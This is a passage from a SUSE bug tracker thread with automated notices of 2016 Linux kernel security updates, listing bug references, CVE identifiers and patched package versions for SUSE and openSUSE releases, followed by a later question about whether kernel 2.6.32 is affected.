SUSE Linux Enterprise Debuginfo 11-SP3 (src):    kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-pae-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1
Comment 34 Marcus Meissner 2016-08-01 12:51:40 UTC
released
Comment 35 Swamp Workflow Management 2016-08-15 14:13:55 UTC
SUSE-SU-2016:2074-1: An update that solves 48 vulnerabilities and has 13 fixes is now available.

Category: security (important)
Bug References: 816446,861093,928130,935757,939826,942367,945825,946117,946309,948562,949744,949936,951440,952384,953527,954404,955354,955654,956708,956709,958463,958886,958951,959190,959399,961500,961509,961512,963765,963767,964201,966437,966460,966662,966693,967972,967973,967974,967975,968010,968011,968012,968013,968670,970504,970892,970909,970911,970948,970956,970958,970970,971124,971125,971126,971360,972510,973570,975945,977847,978822
CVE References: CVE-2013-2015,CVE-2013-7446,CVE-2015-0272,CVE-2015-3339,CVE-2015-5307,CVE-2015-6252,CVE-2015-6937,CVE-2015-7509,CVE-2015-7515,CVE-2015-7550,CVE-2015-7566,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8539,CVE-2015-8543,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2015-8816,CVE-2016-0723,CVE-2016-2069,CVE-2016-2143,CVE-2016-2184,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549,CVE-2016-2782,CVE-2016-2847,CVE-2016-3134,CVE-2016-3137,CVE-2016-3138,CVE-2016-3139,CVE-2016-3140,CVE-2016-3156,CVE-2016-4486
Sources used:
SUSE Linux Enterprise Server 11-SP2-LTSS (src):    kernel-default-3.0.101-0.7.40.1, kernel-ec2-3.0.101-0.7.40.1, kernel-pae-3.0.101-0.7.40.1, kernel-source-3.0.101-0.7.40.1, kernel-syms-3.0.101-0.7.40.1, kernel-trace-3.0.101-0.7.40.1, kernel-xen-3.0.101-0.7.40.1
SUSE Linux Enterprise Debuginfo 11-SP2 (src):    kernel-default-3.0.101-0.7.40.1, kernel-ec2-3.0.101-0.7.40.1, kernel-pae-3.0.101-0.7.40.1, kernel-trace-3.0.101-0.7.40.1, kernel-xen-3.0.101-0.7.40.1
Comment 36 Swamp Workflow Management 2016-10-26 16:15:00 UTC
openSUSE-SU-2016:2649-1: An update that solves 49 vulnerabilities and has 17 fixes is now available.

Category: security (important)
Bug References: 1004418,758540,816446,861093,917648,928130,935757,939826,942367,944296,945825,946117,946309,948562,949744,949936,951440,952384,953527,954404,955354,955654,956708,956709,958463,958886,958951,959190,959399,961500,961509,961512,963765,963767,964201,966437,966460,966662,966693,967972,967973,967974,967975,968010,968011,968012,968013,968670,969356,970504,970892,970909,970911,970948,970956,970958,970970,971124,971125,971126,971360,972510,973570,975945,977847,978822
CVE References: CVE-2013-7446,CVE-2015-0272,CVE-2015-1339,CVE-2015-3339,CVE-2015-5307,CVE-2015-6252,CVE-2015-6937,CVE-2015-7509,CVE-2015-7515,CVE-2015-7550,CVE-2015-7566,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8539,CVE-2015-8543,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2015-8816,CVE-2016-0723,CVE-2016-2069,CVE-2016-2143,CVE-2016-2184,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549,CVE-2016-2782,CVE-2016-2847,CVE-2016-3134,CVE-2016-3137,CVE-2016-3138,CVE-2016-3139,CVE-2016-3140,CVE-2016-3156,CVE-2016-4486,CVE-2016-5195
Sources used:
openSUSE Evergreen 11.4 (src):    kernel-debug-3.0.101-105.1, kernel-default-3.0.101-105.1, kernel-desktop-3.0.101-105.1, kernel-docs-3.0.101-105.2, kernel-ec2-3.0.101-105.1, kernel-pae-3.0.101-105.1, kernel-source-3.0.101-105.1, kernel-syms-3.0.101-105.1, kernel-trace-3.0.101-105.1, kernel-vanilla-3.0.101-105.1, kernel-vmi-3.0.101-105.1, kernel-xen-3.0.101-105.1, preload-1.2-6.83.1
Comment 37 Ales Novak 2018-10-25 16:27:31 UTC
Is 2.6.32 affected? There's a bsc#1110072 including request for it.